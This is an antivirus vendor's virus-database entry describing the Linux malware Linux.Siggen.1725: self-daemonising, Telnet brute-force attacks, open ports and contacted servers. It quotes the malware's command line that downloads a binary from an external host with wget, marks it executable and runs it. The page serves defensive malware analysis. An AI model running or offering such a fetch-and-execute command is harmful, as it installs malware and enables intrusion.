La mia libreria
La mia libreria

+ Aggiungi alla libreria

Supporto
Supporto 24/7 | Regole per contattare

Richieste

Profile

Linux.Siggen.1725

Aggiunto al database dei virus Dr.Web: 2019-05-20

La descrizione è stata aggiunta:

Technical Information

Malicious functions:
Removes itself
Launches itself as a daemon
Launches processes:
  • sh -c wget http://www.1vex.cn/n2; chmod 777 *; ./n2 wget.echo.telnet.mips
  • wget http://www.1vex.cn/n2
  • chmod 777 n2 run.sh stdout.log
  • ./n2 wget.echo.telnet.mips
Kills the following processes:
  • /root/n2
Performs operations with the file system:
Modifies file access rights:
  • /root/n2
  • /root/run.sh
Creates or modifies files:
  • /root/n2
Network activity:
Awaits incoming connections on ports:
  • 0.0.0.0:23
  • 0.0.0.0:1997
  • 0.0.0.0:80
  • 0.0.0.0:81
  • 0.0.0.0:8443
  • 0.0.0.0:9009
  • 0.0.0.0:1943
  • 0.0.0.0:1991
  • 0.0.0.0:1338
  • 0.0.0.0:48101
Establishes connection:
  • <LOCAL_DNS_SERVER>
  • 8.#.8.8:53
  • 62.###.207.229:89
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
  • ww#.#vex.cn/n2
DNS ASK:
  • ww#.1vex.cn
Sends data to the following servers:
  • 62.###.207.229:89
Receives data from the following servers:
  • 62.###.207.229:89

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number